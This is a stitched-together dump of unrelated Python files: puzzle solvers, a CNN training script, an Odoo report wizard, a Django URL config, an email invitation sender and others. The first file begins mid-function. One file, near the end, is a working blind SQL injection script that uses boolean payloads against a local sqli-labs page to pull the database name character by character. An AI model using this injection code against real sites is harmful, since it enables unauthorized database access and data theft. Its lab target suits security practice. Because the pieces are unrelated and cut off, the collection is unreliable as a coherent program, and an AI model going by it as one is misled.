string = str(number)
a = (int(string[0:2]), number, int(string[2:4]))
return a
if __name__ == '__main__':
triangle = []
square = []
pentagons = []
hexagons = []
heptagons = []
octagons = []
upper = 9999
lower = 999
n = 1
card = 6
halt = True
while halt:
n += 1
tri = int(n*(n+1)/2)
if tri > upper:
halt = False
break
if tri > lower:
triangle.append(tri)
if card == 1:
continue
sqa = int(n**2)
if sqa > upper:
card = 1
continue
if sqa > lower:
square.append(sqa)
if card == 2:
continue
pent = int(n*(3*n-1)/2)
if pent > upper:
card = 2
continue
if pent > lower:
pentagons.append(pent)
if card == 3:
continue
hex = int(n*(2*n-1))
if hex > upper:
card = 3
continue
if hex > lower:
hexagons.append(hex)
if card == 4:
continue
hept = int(n*(5*n-3)/2)
if hept > upper:
card = 4
continue
if hept > lower:
heptagons.append(hept)
if card == 5:
continue
oct = int(n*(3*n-2))
if oct > upper:
card = 5
continue
if oct > lower:
octagons.append(oct)
bigHolder = [[],[],[],[],[],[]]
for t in triangle:
bigHolder[0].append([[1,2,3,4,5], giveParts(t)])
for s in square:
bigHolder[1].append(giveParts(s))
for p in pentagons:
bigHolder[2].append(giveParts(p))
for h in hexagons:
bigHolder[3].append(giveParts(h))
for h in heptagons:
bigHolder[4].append(giveParts(h))
for o in octagons:
bigHolder[5].append(giveParts(o))
chains = bigHolder[0].copy()
for k in range(5):
holder = []
for c in chains:
last = c[len(c)-1][2]
for left in c[0]:
for a in bigHolder[left]:
if a[0] == last:
temp = c[0].copy()
temp.remove(left)
r = c.copy()
r.pop(0)
r = [temp] + r + [a]
holder.append(r)
chains = holder.copy()
for c in chains:
c.pop(0)
if c[0][0] == c[5][2]:
this = c.copy()
break
summation = 0
for c in this:
summation += c[1]
print(summation)
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
radio = ({"radio": "Express FM", "stream": "http://stream4.nadaje.com:13324/express", "service": "NULL"},
{"radio": "Bielsko FM", "stream": "http://stream4.nadaje.com:13322/radiobielsko", "service": "NULL"},
{"radio": "Mega", "stream": "http://stream6.nadaje.com:8012/test", "service": "https://player.nadaje.com/services/3848/"},
{"radio": "Disco", "stream": 'http://stream4.nadaje.com:8174/test', "service": "https://player.nadaje.com/services/4133/"},
{"radio": "Nuta", "stream": "http://stream4.nadaje.com:8392/test", "service": "https://player.nadaje.com/services/4134/"},
{"radio": "RMF MAXXX", "stream": "http://31.192.216.8:80/rmf_maxxx", "service": "NULL"},
{"radio": "RMF FM", "stream": "http://31.192.216.8:80/rmf_fm", "service": "NULL"})
title_pomijanie = ("Radio EXPRESS FM prawdziwa lokalna stacja",
"Radio BIELSKO przeboje non stop",
"no title found")
|
# -*- coding: utf-8 -*-
"""Tests using pytest_resilient_circuits"""
from __future__ import print_function
import os
import pytest
from resilient_circuits.util import get_config_data, get_function_definition
from resilient_circuits import SubmitTestFunction, FunctionResult
from difflib import SequenceMatcher
PACKAGE_NAME = "fn_html2pdf"
FUNCTION_NAME = "fn_html2pdf"
# Read the default configuration-data section from the package
config_data = get_config_data(PACKAGE_NAME)
# Provide a simulation of the Resilient REST API (uncomment to connect to a real appliance)
resilient_mock = "pytest_resilient_circuits.BasicResilientMock"
def call_utilities_html2pdf_function(circuits, function_params, timeout=10):
# Fire a message to the function
evt = SubmitTestFunction("fn_html2pdf", function_params)
circuits.manager.fire(evt)
event = circuits.watcher.wait("fn_html2pdf_result", parent=evt, timeout=timeout)
assert event
assert isinstance(event.kwargs["result"], FunctionResult)
pytest.wait_for(event, "complete", True)
return event.kwargs["result"].value
class TestUtilitiesHtml2Pdf:
""" Tests for the utilities_html2pdf function"""
def test_function_definition(self):
""" Test that the package provides customization_data that defines the function """
func = get_function_definition(PACKAGE_NAME, FUNCTION_NAME)
assert func is not None
@pytest.mark.livetest
@pytest.mark.parametrize("html2pdf_data, html2pdf_data_type, html2pdf_stylesheet, expected_results", [
("<table border=\"1\"><tr><th>key10</th><td><table border=\"1\"><tr><th>key20</th><td><table border=\"1\"><tr><th>a</th><td>a1</td></tr><tr><th>b</th><td>b1</td></tr><tr><th>key30</th><td><ul><li>1</li><li>2</li><li>3</li><li>4</li></ul></td></tr></table></td></tr></table></td></tr></table>",
"string", None, "data/html2pdf/no_stylesheet.b64"),
("<table border=\"1\"><tr><th>key10</th><td><table border=\"1\"><tr><th>key20</th><td><table border=\"1\"><tr><th>a</th><td>a1</td></tr><tr><th>b</th><td>b1</td></tr><tr><th>key30</th><td><ul><li>1</li><li>2</li><li>3</li><li>4</li></ul></td></tr></table></td></tr></table></td></tr></table>",
"string", "@page { size: landscape; }* { font-family: Arial; font-size: small; }table { border-collapse: collapse; }table, th, td { border: 1px solid red; }", "data/html2pdf/stylesheet.b64")
])
def test_success(self, circuits_app, html2pdf_data, html2pdf_data_type, html2pdf_stylesheet, expected_results):
""" Test calling with sample values for the parameters """
function_params = {
"html2pdf_data": html2pdf_data,
"html2pdf_data_type": html2pdf_data_type,
"html2pdf_stylesheet": html2pdf_stylesheet
}
results = call_utilities_html2pdf_function(circuits_app, function_params)
# get the expected data
res_path = os.path.join(os.path.dirname(__file__), expected_results)
with open(res_path, 'r') as file:
expected = file.read()
print (results)
ratio = SequenceMatcher(a=expected, b=results.get('content')).ratio()
assert ratio > 0.95 # weasyprint can render files slightly differently from run to run. thus must check for over 95% match
def test_travis_pass(self):
# ensure one test is run for travis to succeed
return True
|
# Use of break statement inside the loop
for val in "string":
if val == "g":
break
print(val)
|
import re
from typing import Set, Tuple
TESTINPUT = """initial state: #..#.#..##......###...###
...## => #
..#.. => #
.#... => #
.#.#. => #
.#.## => #
.##.. => #
.#### => #
#.#.# => #
#.### => #
##.#. => #
##.## => #
###.. => #
###.# => #
####. => #"""
State = Set[int]
Rule = Tuple[bool, bool, bool, bool, bool]
Rules = Set[Rule]
def parse_raw(input: str) -> Tuple[State, Rules]:
lines = input.split('\n')
# Parse initial state
#####################
rgx_init = "initial state: ([.#]*)"
initial_state_raw = re.match(rgx_init, lines[0]).groups()[0]
initial_state = {i for i, plant in enumerate(initial_state_raw) if plant == '#'}
# Parse the planting rules
##########################
rules = set()
rgx_rules = "([.#]{5}) => ([.#])"
for line in lines[2:]:
pattern, plant = re.match(rgx_rules, line).groups()
if plant == '#':
key = tuple([c == '#' for c in pattern])
rules.add(key)
return initial_state, rules
def step(state: State, rules: Rules) -> State:
next_state = set()
lo = min(state) - 2
hi = max(state) + 2
for plant in range(lo, hi + 1):
key = tuple([
other in state for other in
[plant - 2, plant -1, plant, plant + 1, plant+2]])
if key in rules:
next_state.add(plant)
return next_state
def count_plants(state: State, rules: Rules, n_generations: int=20) -> int:
for _ in range(n_generations):
state = step(state, rules)
return sum(state)
if __name__ == "__main__":
state, rules = parse_raw(TESTINPUT)
assert count_plants(state, rules) == 325
with open('input.txt') as f:
raw = f.read().strip()
state, rules = parse_raw(raw)
# print(count_plants(state, rules))
seen = {} # Mapping from deltas => (generation, lowest)
for gen in range(251):
lowest = min(state)
deltas = [plant - lowest for plant in state]
key = tuple(sorted(deltas))
print(gen, lowest, sum(state))
if key in seen:
print(key, seen[key])
else:
seen[key] = gen
state = step(state, rules)
gen += 1
# In [7]: 4447 + 15 * (50_000_000_000 - 250)
# Out[7]: 750000000697 |
from tika import parser
from os.path import isfile, join
import glob
import re
files_no_ext = [".".join(f.split(".")[:-1]) for f in glob.glob("*.pdf") if isfile(f)]
files_no_ext.sort()
print(files_no_ext[0])
def scrap_file(t):
file_name = t + '.pdf'
path = './' + file_name
raw = parser.from_file(path)
text = raw['content']
#print(text)
regex_ai = 'Относно: (.*)УВАЖ'
match_ai = re.findall(regex_ai, text, flags=re.DOTALL)
match_ai = ''.join(match_ai).replace('\n','') if match_ai else ""
match_a = re.search("имот №\d+", match_ai)
match_a = match_a.group(0) if match_a else ""
match_w = re.search("(община|общ\.) ([^,]+)", match_ai)
match_w = match_w.group(2) if match_w else ""
match_x = re.search("землището на (с\.|село)", match_ai)
match_x = "село" if match_x else ""
match_y = re.search("землището на (с\.|село) ([^,]+)", match_ai)
match_y = match_y.group(2) if match_y else ""
match_aj = re.search("ДО.{0,5}(г-жа|г-н|инж\.)? (\w+) (\w+ )?(\w+)", text, re.IGNORECASE | re.DOTALL)
match_aj = match_aj.group(2) + " " + match_aj.group(4) if match_aj else ""
regex_ay = 'ДИРЕКТОР.*(\d{2}\.\d{2}\.\d{2,4}).*\Z'
match_ay = re.findall(regex_ay, text, flags=re.DOTALL)
match_ay = ''.join(match_ay).replace('.','/')
match_ax = re.sub(r' ', '', t)
print("data :" + str(match_ay))
print("Otnosno: " + match_ai)
print("imot nom:" + match_a)
print("data :" + match_ay)
line_out = match_a + ',' + match_w + ',' + match_x + ',' + match_y + ',"' + match_ai + '",' + match_aj + ',' + match_ax + ',' + match_ay + '\r\n'
print(line_out)
with open('out.csv', 'a') as f:
f.write(line_out) # Python 3.x
for t in files_no_ext:
scrap_file(t)
|
# region headers
# * author: salaheddine.gassim@nutanix.com
# * version: v1.0/10032020 - initial version
# task_name: F5DeleteNode
# description: Delete a single node
# input vars: node_name
# output vars: n/a
# endregion
# region capture Calm variables
api_server = "@@{fortigate_endpoint}@@"
f5_login = "@@{fortigate.username}@@"
f5_password = "@@{fortigate.secret}@@"
api_server_port = 80
node_name = "@@{platform.spec.name}@@"
# endregion
def f5_delete_node(api_server, api_server_port, node_name):
# region prepare api call
api_server_endpoint = "/mgmt/tm/ltm/node/" + node_name
url = "http://{}:{}{}".format(
api_server,
api_server_port,
api_server_endpoint
)
method = "DELETE"
headers = {
'Accept': '*/*'
}
# endregion
# region make api call
# make the API call and capture the results in the variable called "resp"
print("Making a {} API call to {}".format(method, url))
resp = urlreq(url, verb=method, user=f5_login, passwd=f5_password, headers=headers, verify=False)
# deal with the result/response
if resp.ok:
print("Request was successful. Status code: {}".format(resp.status_code))
result = json.loads(resp.content)
print("node {} was deleted".format(result['name']))
else:
print("Request failed")
print("Headers: {}".format(headers))
print('Status code: {}'.format(resp.status_code))
print('Response: {}'.format(json.dumps(json.loads(resp.content), indent=4)))
exit(1)
# endregion
f5_delete_node(api_server, api_server_port, node_name)
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import math
from torch.utils.data import TensorDataset, DataLoader
import torch.utils.data as data
from torchvision import transforms
from torch.autograd import Variable
from torch.nn import functional as F
from torch import nn
import torch
from random import randint, sample
from PIL import Image
import numpy as np
import struct
import gzip
import os
# from tensorboardX import SummaryWriter
torch.cuda.set_device(5)
class MoireCNN(nn.Module):
def conv(self, channels):
x=nn.Sequential(
nn.Conv2d(channels, channels, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(channels, channels, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(channels, channels, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(channels, channels, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(channels, channels, 3, 1, 1),
nn.ReLU(True)
)
return x
def __init__(self):
super().__init__()
self.s11=nn.Sequential(
nn.Conv2d(3, 32, 3, 1, 1),
nn.ReLU(True),
nn.Conv2d(32, 32, 3, 1, 1)
)
self.s12=nn.Conv2d(32, 3, 3, 1, 1)
self.s13=self.conv(32)
self.s21=nn.Sequential(
nn.Conv2d(32, 32, 3, 2, 1),
nn.ReLU(True),
nn.Conv2d(32, 64, 3, 1, 1)
)
self.s22=nn.Sequential(
nn.ConvTranspose2d(64, 32, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(32, 3, 3, 1, 1)
)
self.s23=self.conv(64)
self.s31=nn.Sequential(
nn.Conv2d(64, 64, 3, 2, 1),
nn.ReLU(True),
nn.Conv2d(64, 64, 3, 1, 1)
)
self.s32=nn.Sequential(
nn.ConvTranspose2d(64, 64, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(64, 32, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(32, 3, 3, 1, 1)
)
self.s33=self.conv(64)
self.s41=nn.Sequential(
nn.Conv2d(64, 64, 3, 2, 1),
nn.ReLU(True),
nn.Conv2d(64, 64, 3, 1, 1)
)
self.s42=nn.Sequential(
nn.ConvTranspose2d(64, 64, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(64, 32, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(32, 32, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(32, 3, 3, 1, 1)
)
self.s43=self.conv(64)
self.s51=nn.Sequential(
nn.Conv2d(64, 64, 3, 2, 1),
nn.ReLU(True),
nn.Conv2d(64, 64, 3, 1, 1)
)
self.s52=nn.Sequential(
nn.ConvTranspose2d(64, 64, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(64, 32, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(32, 32, 4, 2, 1),
nn.ReLU(True),
nn.ConvTranspose2d(32, 32, 4, 2, 1),
nn.ReLU(True),
nn.Conv2d(32, 3, 3, 1, 1)
)
self.s53=self.conv(64)
def forward(self, x):
x1=self.s11(x)
x2=self.s21(x1)
x3=self.s31(x2)
x4=self.s41(x3)
x5=self.s51(x4)
x1=self.s12(self.s13(x1))
x2=self.s22(self.s23(x2))
x3=self.s32(self.s33(x3))
x4=self.s42(self.s43(x4))
x5=self.s52(self.s53(x5))
x=x1+x2+x3+x4+x5
return x
def train(epoch, lr):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
if use_gpu:
data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)
data, target = Variable(data), Variable(target)
optimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=0.00001)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
if batch_idx % 5000 == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.data))
def test(epoch):
model.eval()
idx = 0
loss_sum = 0.0
for (data, target) in test_loader:
if use_gpu:
data, target = data.cuda(non_blocking=True), target.cuda(non_blocking=True)
data, target = Variable(data), Variable(target)
with torch.no_grad():
output = model(data)
loss = criterion(output, target)
loss_sum += loss.data
idx += 1
loss_sum /= idx
print('Test Epoch: {} \tLoss: {:.6f}'.format(
epoch, loss_sum))
global pre_loss, lr, best_loss
if loss_sum > pre_loss:
lr *= 0.9
if loss_sum < best_loss:
best_loss = loss_sum
torch.save(model, "moire-1.pth")
pre_loss = loss_sum
class MoirePic(data.Dataset):
def __init__(self, rootX, rootY, training=True):
self.picX=[rootX+i for i in os.listdir(rootX)]
self.picY=[rootY+i for i in os.listdir(rootY)]
self.picX.sort()
self.picY.sort()
# self.picX=self.picX[:40]
# self.picY=self.picY[:40]
self.Len=len(self.picX)
if not training:
L = sample(range(self.Len), self.Len//10)
tempX = [self.picX[i] for i in L]
tempY = [self.picY[i] for i in L]
self.picX=tempX
self.picY=tempY
self.Len=len(L)
def __getitem__(self, index):
tf=transforms.ToTensor()
def rand_crop(data,label):
img_w, img_h = 256, 256
width1 = randint(0, data.shape[1] - img_w )
height1 = randint(0, data.shape[2] - img_h)
width2 = width1 + img_w
height2 = height1 + img_h
return (data[:,width1:width2,height1:height2],
label[:,width1:width2,height1:height2])
pathX, pathY=self.picX[index], self.picY[index]
imgX, imgY=Image.open(pathX), Image.open(pathY)
return rand_crop(tf(imgX), tf(imgY))
def __len__(self):
return self.Len
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(mean=0.0, std=0.01)
m.bias.data.fill_(0)
dataset = MoirePic("/data_new/moire/trainData/source/",
"/data_new/moire/trainData/target/")
testdataset = MoirePic("/data_new/moire/trainData/source/",
"/data_new/moire/trainData/target/", False)
use_gpu = torch.cuda.is_available()
batch_size = 8
kwargs = {'num_workers': 14, 'pin_memory': True}
train_loader = DataLoader(dataset=dataset, shuffle=True,
batch_size=batch_size, **kwargs)
test_loader = DataLoader(dataset=testdataset, shuffle=True,
batch_size=batch_size, **kwargs)
# model = MoireCNN()
model = torch.load("moire-1.pth")
# model.apply(weights_init)
# with SummaryWriter(comment='MoireCNN') as w:
# w.add_graph(model, (x, ))
if use_gpu:
model = model.cuda()
# model = nn.DataParallel(model)
print('USE GPU')
else:
print('USE CPU')
criterion = nn.MSELoss()
lr = 0.00004
pre_loss = 100.0
best_loss = 100.0
for epoch in range(100):
train(epoch, lr)
test(epoch) |
import os
import sys
import json
from copy import deepcopy
import __main__
import textwrap
from types import ModuleType
from typing import TextIO, Dict, Any, Generator, List
from herzog.parser import parse_cells, CellType, JUPYTER_SHELL_PFX, JUPYTER_MAGIC_PFX
class Cell:
def __init__(self, cell_type):
self.cell_type = CellType[cell_type]
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
return None
class Sandbox:
def __init__(self):
self._state = None
self._state_modules = None
def __enter__(self):
self._state = deepcopy({k: v for k, v in __main__.__dict__.items()
if not isinstance(v, ModuleType)})
self._state_modules = {k: v for k, v in __main__.__dict__.items()
if isinstance(v, ModuleType)}
return self
def __exit__(self, *args, **kwargs):
if self._state:
__main__.__dict__.update(self._state)
for key in __main__.__dict__.copy():
if key not in self._state:
del __main__.__dict__[key]
__main__.__dict__.update(self._state_modules)
def load_ipynb_cells(ipynb: TextIO) -> List[Dict[Any, Any]]:
try:
return json.loads(ipynb.read())['cells']
except (json.JSONDecodeError, KeyError):
print(f"Check that '{ipynb}' is a valid ipynb file.", file=sys.stderr)
raise
def translate_to_ipynb(herzog_handle: TextIO) -> Dict[str, Any]:
cells = [obj.to_ipynb_cell() for obj in parse_cells(herzog_handle)
if obj.has_ipynb_representation]
with open(os.path.join(os.path.dirname(__file__), "data", "python_3_boiler.json")) as fh:
boiler = json.loads(fh.read())
return dict(cells=cells, **boiler)
def translate_to_herzog(ipynb_handle: TextIO, indent: int = 4) -> Generator[str, None, None]:
cells = load_ipynb_cells(ipynb_handle)
prefix = " " * indent
yield "import herzog\n\n"
for cell in cells:
if isinstance(cell.get('source', None), list):
cell['source'] = "".join(cell['source'])
if cell['cell_type'] == "markdown":
s = '\nwith herzog.Cell("markdown"):\n """\n'
s += textwrap.indent(cell['source'], prefix=prefix).rstrip()
s += '\n """\n'
for line in s.split("\n"):
yield line + "\n"
elif cell['cell_type'] == "code":
s = "\nwith herzog.Cell('python'):\n"
s += textwrap.indent(cell['source'], prefix=prefix).rstrip()
for line in s.split("\n"):
if line.startswith("%"):
yield line.replace("%", JUPYTER_MAGIC_PFX, 1) + "\n"
elif line.startswith("!"):
yield line.replace("!", JUPYTER_SHELL_PFX, 1) + "\n"
else:
yield line + "\n"
else:
print(f"cell_type not implemented yet: {cell['cell_type']}", file=sys.stderr)
# warn the user and add, but comment out
yield "\n"
yield "## .ipynb -> Herzog translation failed:\n"
yield f"## Cell type '{cell['source']}' not supported by Herzog. " \
f"Supported cell types are {CellType._member_names_}\n"
yield f"# with herzog.Cell('{cell['cell_type']}'):\n"
s = textwrap.indent(cell['source'], prefix=prefix).rstrip() + "\n"
for line in s.split("\n"):
yield f"# {line}\n"
|
def fibonacci():
a, b = 0, 1
while True:
yield a
a, b = b, a + b
for fib in fibonacci():
print(fib)
if fib > 100:
break
|
import threading
import time
def test1():
for i in range(5):
print("--------test1-------%d--------" % i)
time.sleep(1)
def main():
print(threading.enumerate())
# 线程指定目标为一个函数比较方便
# 当目标比较复杂时,线程也可以直接指定为一个类,继承于threading.thread类
# 然后直接创建该类对象,然后可以调用父类的start方法,然后自动先调用该类的run方法
# 注意一定是run方法,其他方法可以在run方法中调用来实现调用该类中的其他方法
# 1. t = MyThread()
# 2. t.start()
t1 = threading.Thread(target=test1)
print(threading.enumerate())
t1.start()
print(threading.enumerate()) # 查看当前线程数
if __name__ == "__main__":
main() |
import sys
for _ in [0]*int(sys.stdin.readline().strip()):
v=4*float(sys.stdin.readline().strip())
a=pow(v,0.3333333333333333)
x=a*a*1.7320508075688772
print("%.10f"%((x/2)+(3*a*(v/x))))
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import xlwt
import base64
from io import StringIO
from odoo import api, fields, models, _
import platform
class PurchaseReportOut(models.Model):
_name = 'expense.report.out'
_description = 'expense order report'
purchase_data = fields.Char('Name', size=256)
file_name = fields.Binary('Purchase Excel Report', readonly=True)
purchase_work = fields.Char('Name', size=256)
file_names = fields.Binary('Purchase CSV Report', readonly=True)
class WizardWizards(models.Model):
_name = 'wizard.reportes'
_description = 'purchase wizard'
# purchase order excel report button actions
@api.multi
def action_purchase_report(self):
# XLS report
custom_value = {}
label_lists = ['Tipo Documento Beneficiario', 'Nit Beneficiario', 'Nombre Beneficiario', 'Tipo Transaccion', 'Codigo Banco', 'No Cuenta Beneficiario', 'Email', 'Documento Autorizado', 'Referencia',
'OficinaEntrega', 'ValorTransaccion', 'Fecha de aplicación']
order = self.env['hr.expense.sheet'].browse(self._context.get('active_ids', list()))
#ordershet = self.env['hr.expense.sheet'].browse(self._context.get('active_ids', list()))
workbook = xlwt.Workbook()
for obj in order:
purchase = []
for lines in obj:
product = {}
product['origin'] = lines.origin.name
product['default_code'] = lines.default_code
purchase.append(product)
custom_value['products'] = purchase
custom_value['origin'] = lines.origin.name
custom_value['default_code'] = obj.default_code
custom_value['user_id'] = obj.name
custom_value['company_id'] = obj.company_id.vat
style0 = xlwt.easyxf(
'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz right;',
num_format_str='#,##0.00')
style1 = xlwt.easyxf(
'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz left;',
num_format_str='#,##0.00')
style2 = xlwt.easyxf('font:height 250,bold True;borders:left thin, right thin, top thin, bottom thin;', num_format_str='#,##0.00')
style5 = xlwt.easyxf(
'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;align: horiz center;',
num_format_str='#,##0')
style6 = xlwt.easyxf(
'font: name Times New Roman bold on;borders:left thin, right thin, top thin, bottom thin;',
num_format_str='#,##0.00')
sheet = workbook.add_sheet("objname")
#sheet = workbook.add_sheet(rec.name)
sheet.write(0, 0, 'NIT PAGADOR', style1)
sheet.write(0, 1, 'TIPO DE PAGO', style1)
sheet.write(0, 2, 'APLICACIÓN', style1)
sheet.write(0, 3, 'SECUENCIA DE ENVÍO', style1)
sheet.write(0, 4, 'NRO CUENTA A DEBITAR', style1)
sheet.write(0, 5, 'TIPO DE CUENTA A DEBITAR', style1)
sheet.write(0, 6, 'DESCRIPCÓN DEL PAGO', style1)
sheet.write(2, 0, 'Tipo Documento Beneficiario', style1)
sheet.write(2, 1, 'Nit Beneficiario', style1)
sheet.write(2, 2, 'Nombre Beneficiario', style1)
sheet.write(2, 3, 'Tipo Transaccion', style1)
sheet.write(2, 4, 'Código Banco', style1)
sheet.write(2, 5, 'No Cuenta Beneficiario', style1)
sheet.write(2, 6, 'Email', style1)
sheet.write(2, 7, 'Documento Autorizado', style1)
sheet.write(2, 8, 'Referencia', style1)
sheet.write(2, 9, 'OficinaEntrega', style1)
sheet.write(2, 10,'ValorTransaccion', style1)
sheet.write(2, 11,'Fecha de aplicación', style1)
#i=4
#for n in custom_value['products']:
# i=i+1
# sheet.write(i, 3, n['origin'], style6)
# sheet.write(i, 4, n['default_code'], style0)
# n += 1
n = 11; m=10; i = 1
for product in custom_value['products']:
sheet.write(n, 1, i, style5)
sheet.write_merge(n, n, 2, 3, product['origin'], style6)
sheet.write_merge(n, n, 4, 5, product['default_code'], style0)
n += 1; m +=1; i += 1
#n = 11; m=10; i = 1
#for product in custom_value['products']:
# sheet.write_merge(n, n, 2, 3, product['origin'], style6)
#sheet.write(3, 1, product['default_code'], style0)
# CSV report
datas = []
for values in order:
for value in values:
if value:
item = [
str(value.categ_id.name or ''),
str(value.origin.name or ''),
str(value.applicant.name or ''),
str(value.company_id.name or ''),
]
datas.append(item)
output = StringIO()
label = ','.join(label_lists)
output.write(label)
output.write("\n")
for data in datas:
record = ';'.join(data)
output.write(record)
output.write("\n")
data = base64.b64encode(bytes(output.getvalue(),"utf-8"))
if platform.system() == 'Linux':
filename = ('/tmp/Purchase Report' + '.xls')
else:
filename = ('Purchase Report' + '.xls')
workbook.save(filename)
fp = open(filename, "rb")
file_data = fp.read()
out = base64.encodestring(file_data)
# Files actions
attach_vals = {
'purchase_data': 'Purchase Report'+ '.xls',
'file_name': out,
'purchase_work':'Purchase'+ '.csv',
'file_names':data,
}
act_id = self.env['expense.report.out'].create(attach_vals)
fp.close()
return {
'type': 'ir.actions.act_window',
'res_model': 'expense.report.out',
'res_id': act_id.id,
'view_type': 'form',
'view_mode': 'form',
'context': self.env.context,
'target': 'new',
}
|
#!/usr/bin/python
# -*-coding:Utf-8 -*
##########################################################
"""
Exceptions for the SOLIDServer modules
"""
__all__ = ["SDSError",
"SDSInitError",
"SDSServiceError",
"SDSRequestError"]
class SDSError(Exception):
""" generic class for any exception in SOLIDServer communication """
pass
class SDSInitError(SDSError):
""" raised when action on non initialized SDS connection """
pass
class SDSServiceError(SDSError):
""" raised on unknown service """
def __init__(self, service_name):
self.service = service_name
class SDSRequestError(SDSError):
""" raised when urllib request is failing """
def __init__(self, method, url, headers):
self.method = method
self.url = url
self.headers = headers
|
from django.contrib import admin
from django.urls import include, path
from django.conf.urls.static import static
from django.conf import settings
from django.views.decorators.csrf import csrf_exempt
from blog.views import AboutView, handler404, handler500
from write_blog.views import image_upload
urlpatterns = [
path('admin/', admin.site.urls),
path('user/', include('registration.urls')),
path('profile/', include('user_profile.urls')),
path('tinymce/', include('tinymce.urls')),
path('accounts/', include('allauth.urls')),
path('media/images/uploads/', csrf_exempt(image_upload)),
path('', include('blog.urls')),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
handler404 = handler404
handler500 = handler500
|
#!/usr/bin/python
import httplib
import sys
import threading
import time
import urlparse
import urllib
from collections import OrderedDict
from os import _exit,system
def connect(host,port,verb,path,query,data=None,headers={}):
path = path +'?'+ urllib.urlencode(query)
h = httplib.HTTPConnection(host,int(port))
h.request("GET",path,"",{})
return h.getresponse().read()
def request(url):
parser = urlparse.urlparse(url)
request.host = parser.netloc.split(':')[0]
request.port = 80 if 'http' in parser.scheme else parser.netloc.split(':')[1]
request.query = OrderedDict(urlparse.parse_qsl(parser.query))
request.path = parser.path
return request
def inject(url,vuln_param=None,prefix=None,suffix=None,verb=None):
parser = request(url)
verb = verb if verb else "GET"
tc = 'You are in...........';
rc = 0
val = ""
for x in range(1,9):
b = '0'
for y in range(2,9):
payload = " 1' AND (select mid((lpad(bin(ascii(mid((select database()),%d,1))),8,0)),%d,1)) AND '1'='1" %(x,y)
if vuln_param in parser.query.keys():
parser.query[vuln_param] = payload
else:
_exit(1)
st = time.time()
rc += 1
response = connect(parser.host,parser.port,verb,parser.path,parser.query)
et = int(time.time() - st)
if et >= 1:
break
else:
if tc in response:
# print 'found'
b += '1'
else:
b += '0'
system('cls')
print b
val += chr(int(b,2))
print "Database Name : {0}".format(val),
sys.stdout.flush()
print "\n[+] No of requests %d" %rc
inject("http://localhost/sqli/Less-8/index.php?id=1",vuln_param="id") |
#!/usr/bin/env python
import jinja2
import mimetypes
import numpy as np
import os
import smtplib
import sys
import getpass
import email
import email.utils
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
if len(sys.argv) < 3:
print('Usage: ./send-invitations.py pc_invitees.csv pc_invitation.txt.in')
with open(sys.argv[2], 'r') as fp:
email_template = fp.read()
template = jinja2.Template(email_template)
pc_invitees = np.loadtxt(sys.argv[1],
delimiter=',',
dtype={'names': ('invitee', 'email','fields'),
'formats': ('S128', 'S128', 'S128')})
expertise_name_map = {
'cs': 'scientific computing with python',
'edu': 'scientific computing education',
'geo': 'geophysics',
'gis': 'geospatial data',
'gissci': 'geospatial data in science',
'astro': 'astronomy and astrophysics',
'viz': 'visualization',
'soc': 'computational social sciences',
'bioinfo': 'bioinformatics',
'eng': 'engineering'}
def get_fields(fields):
split_fields = fields.split(" ")
if len(split_fields) == 1:
fieldstr = expertise_name_map[split_fields[0]]
is_are_str = "is"
if len(split_fields) == 2:
fieldstr = expertise_name_map[split_fields[0]] +\
" and " +\
expertise_name_map[split_fields[1]]
is_are_str = "are"
if len(split_fields) > 2:
raise Exception("Too many fields in"+fields)
return fieldstr, is_are_str
username = 'katyhuff@gmail.com'
password = getpass.getpass('password:')
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
for member in pc_invitees:
fieldstr, is_are_str =get_fields(member['fields'])
email_body = template.render(name=member['invitee'],
expertise=fieldstr,
isare=is_are_str)
msg = MIMEMultipart('alternative')
msg['Subject'] = 'Invitation to SciPy2014 Program Committee'
msg['From'] = 'Katy Huff <katyhuff@gmail.com>'
msg['To'] = member['email']
msg['Cc'] = 'Serge Rey <sjsrey@gmail.com>,'
msg['Date'] = email.utils.formatdate()
msg.attach(MIMEText(email_body, 'plain'))
from_address = 'Katy Huff <katyhuff@gmail.com>'
to_address = ['Serge Rey <sjsrey@gmail.com>']
to_address.extend([em.strip() for em in member['email'].split(',')])
print(email_body)
server.sendmail(from_address, to_address, msg.as_string())
|
def countUnvisited(n, m):
i = 0
x = (m * n) - m - n
queue = []
queue.append(x)
set = {x}
count = 0
while (len(queue) > 0):
curr = queue[0]
queue.remove(queue[0])
count += 1
key = curr - m
if (key > 0 and key not in set):
queue.append(key)
set.add(key)
key = curr - n
if (key > 0 and key not in set):
queue.append(key)
set.add(key)
return count
if __name__ == '__main__':
t = int(input('Enter the number of test cases:- '))
for _ in range(t):
